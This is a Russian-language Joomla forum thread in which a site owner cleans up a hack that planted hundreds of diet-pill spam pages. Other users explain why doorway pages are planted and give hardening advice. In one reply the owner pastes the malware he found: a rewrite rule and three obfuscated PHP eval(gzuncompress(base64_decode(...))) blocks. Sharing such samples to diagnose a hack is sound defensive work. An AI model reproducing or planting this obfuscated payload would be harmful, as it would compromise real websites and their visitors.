Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 18 Ответов
  • 3397 Просмотров
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Здравствуйте.
На моем сайте были установелны страницы рекламного характера (про турбослим, чай для похудения), Яндекс вебмастер показывает свыше 500 новых этих спамных страниц. Эти страницы были установлены где-то 13 февраля, я узнал про них где-то 24 февраля.

Сайт находится на хостинге Таймвеб. На эти спамные страницы были проставлены ссылки с твитера, через акаунты этих твитов, я нашел другие сайты с такой же хакерской атакой. Все они были на хостинге Таймвеб. Техподдержка Таймвеба шаблоно отписалась.

Как удалить эти страницы?  !   В базе данных я удалил файлы относящихся к этим страницам (БД redirect_links), страницы остались.

Как удалить эти страницы?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Взломали сайт хакеры Joomla 3
« Ответ #2 : 28.02.2014, 09:04:30 »
Все они были на хостинге Таймвеб.

Подозрительно
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #3 : 28.02.2014, 14:23:29 »
.htaccess посмортел, сравнил с денверским хтаксесом, обнаружил одну новую строчку:


 RewriteRule ^kiff(.*)$ /includes/js/$1 [L]


вирусные страницы начинаются с адреса http://сайт/kiff/...

kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Взломали сайт хакеры Joomla 3
« Ответ #4 : 28.02.2014, 14:25:24 »
Страницы скорее всего просто перестанут выводится. Надо еще узнать, как ломали.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Взломали сайт хакеры Joomla 3
« Ответ #5 : 28.02.2014, 14:29:31 »
RewriteRule ^kiff(.*)$ /includes/js/$1 [L]
kiff тут и там, значит если я удалю эту строчку в хтаксесе, удалятся эти вирусные страницы?
Смотри что в папке по пути /includes/js/
Правило редиректа конечно удаляй
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #6 : 28.02.2014, 14:52:38 »
в папке по пути /includes/js/ два файла:

     .htaccess и Index.php.

в .htaccess написано только это:

     RewriteEngine On
RewriteBase /kiff

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule .* index.php

в Index.php написано:

<? eval(gzuncompress(base64_decode('eF6NUl1rwkAQ/Ct9KJyBUvxoxEPyYB9yPgjFKyQ2RUJyOVCb0qK0Nf763txalXonvsws7Mxmdi+3YvL0OJo8v7Kch/1BJxyEYc7m0Wi9LppWWWx0/yGvtPqodIupXrJkN/eGgRLQsODun+rFdpOmjMH8s3yv2y6VUUAQ8102k99qPI3cKohKowL7lcVYtlXMlxVkKaAGbKwr5tsqpVQaNAVEBP78x3SoLiQ06aDYZcBLu9DFsA/NvsaF7qmTrvp3M98OqXyzL9XdLogXtULxE/m/cbh0NkNl5oOcqdAgF93qZKdaC5t2de5SPWmVSpjXdM7c/1mNUdjbuGf4/YVI7L6Z2Oc699vU8piY0n6xIBj+AgSy1RM='))); ?><? eval(gzuncompress(base64_decode('eF6Njs1qg1AQhV8lCyEKXVxtTZHgwtSMtohNrs6glhL8uQHRaLAaCCXvXrWLdtfCLIbvzJlzjkOT92XbLA76o36vGaquy1KpfEqpaXVdepWXWBEnpJDAIKwqc3m3DIAjgmGH2xrCmh8Dsv7GccSSHdbFBisOHAwnVJ//IY/xfqhyiBhsOcwoPkEp9ua0pi5nud1ePC05Zy6tvOZF9bT+nJziWY5+Nwg4JjD+C34QIaNgfO1y1HEyOLNvnNfrbN195+w1YygcGoonFUW0qUfk2xab+mnEPPQv2ZQ6HSvrTvRD1yyy9EOsHg6FyNtCyFL6JpXvyvr2BVs5a5w='))); ?><? eval(gzuncompress(base64_decode('eF6Nk1FvmzAUhf8KrSwVa4xgwECGXClLnTZaBBWQvUTIQgyUaluIKDxUbf77rtNqgzaO9oAsuOc7+B5fI2ExdLuKv85W6eZKTKkXEBpQKq7yjZXrSKQ8+c6TjaA+dewpoVS3cG60Tb/7oVufbJPKB+MQCaI0IrkuBTa73Hbd/stkUjZ15Zvlvvi8L8rtz8Js+wkS1mX4UOsX1e9993TyzwTnGCPhsFNFG+dh9euxOm/hnLNw3yw0lYCCAAmXFW1bPOmDgofZ9eDVx8bgLYAiOEIEinxsGTQx5utkFd9nAhYD0lLrnbH+Pk6zxZKvblJDRbiScLHako4tE56tkyhLZlG64InRtX2lZr33LCAAnQpwCvErffx3MQA+u+VRdtKJWOesgrHVHZ/d8GSxjubZMo6GZ0MIhDIcmXkcf1tyjJ+RoGwohPOom7aCef2r0opHGBVPY9ew+PgZfICC8aLmCJVHL79JrTksuFgzVS1MZQs+Dg/KW2WNm3zdkyF3EB6qcttoSpIcSWio35XdQ7PTtvXRCongtQsVeJzUYBQgXP4LxuoC7s3LixJ0PoLef4HuR9D/B2IldxzoAIdt1fXtTh2F96Y7/AEfHFDZ'))); ?>

 код басе64 расшифровывает китайскими иероглифами (сайт /base64.ru/)   На денвере папки js нету.

Получается, если удалю папку js, то я избавлюсь от вируса полностью?

*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #7 : 28.02.2014, 22:14:21 »
Короче, удалил эту папку.


Спасибо за помощь, а то не знал что делать!  ^-^ ^-^ ^-^
*

Danter

  • Осваиваюсь на форуме
  • 21
  • 1 / 1
Re: Взломали сайт хакеры Joomla 3
« Ответ #8 : 09.03.2014, 21:52:36 »
Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт хакеры Joomla 3
« Ответ #10 : 10.03.2014, 15:48:22 »
Скажите, пожайлуйста, а какая цель у этих хакеров? Вроде ссылок на другие сайты они не ставили.

Чего они добиваются таким способом?
Если у вас есть тИЦ на сайте, то это хорошая площадка для продвижения ДОРОВ, т.е дорвейщик, оптимизирует страницы под SEO, и выдвигает торговое предложение какой либо конторы, и при прогонах по определенным площадкам, эти страници занимают на какое то время топовые места по запросу в ПС, есть техники еще слива трафа, если от 1к уников в сутки, то вы тоже потенциальный клиент для взлома... если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД. в результате обращаются к хакерам, ту можно много аспектов привести...
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #11 : 28.06.2014, 15:41:40 »
если ведете коммерческую деятельность, то конкурентов может заинтересовать ваша БД
Подскажите как обезопасить себя?
*

ChaosHead

  • Гуру
  • 5241
  • 451 / 13
Re: Взломали сайт хакеры Joomla 3
« Ответ #12 : 28.06.2014, 16:08:31 »
Регулярно обновляйте Joomla, дополнения ставьте только с Joomla.org, шаблоны только с официальных сайтов, делайте регулярную резервную копию (откатиться в 100 раз проще, чем лечить сайт)
Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Взломали сайт хакеры Joomla 3
« Ответ #13 : 28.06.2014, 17:44:54 »
Подскажите как обезопасить себя?
Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ
Мелкий ремонт. skype poisk-plus
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #14 : 28.06.2014, 18:00:38 »
Закройте админ, поставьте капчу, поставьте компонент защиты, закройте загрузку левых файлов в папку имедж и самое главное если не умеете лечить вирусы: НИКОГДА НЕ СТАВЬТЕ ВАРЕЗНЫЕ РАСШИРЕНИЯ
Админку закрыли.
Капчу думал поставить, но для интернет магазина это имеет большой минус - клиенты, возраст которых около 30 лет, не ладят с компьютерами (основная часть) и порой лишнее поле для заполнения создает им проблему, из-за чего значительно падает количество заказов.
По поводу компонентов защиты - что посоветуете ставить?
« Последнее редактирование: 28.06.2014, 18:11:16 от bgg87 »
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #15 : 28.06.2014, 18:09:50 »
Защищайте свой компьютер, часто ломают украв пароль от ftp с вашего компьютера. Нужен хороший антивирус и не сохраняйте пароли в ftp-менеджерах.
Спасибо за совет.
Действительно без антивируса никак, но и это не гарантия. Ставил несколько самых популярных и это не спасало (без названия, антирекламой не буду заниматься) :)
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Взломали сайт хакеры Joomla 3
« Ответ #16 : 28.06.2014, 18:33:14 »
Несколько самое то ставить :)
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
*

bgg87

  • Захожу иногда
  • 164
  • 2 / 0
  • Истина где-то рядом...
Re: Взломали сайт хакеры Joomla 3
« Ответ #18 : 28.06.2014, 18:49:25 »
Несколько самое то ставить :)
:)
имею ввиду подряд, а не одновременно! :)
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

Ответов: 1
Просмотров: 132
Последний ответ 23.04.2024, 10:06:10
от wishlight
При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 353
Последний ответ 31.03.2024, 16:14:32
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 1047
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1177
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1656
Последний ответ 05.11.2021, 21:47:31
от wishlight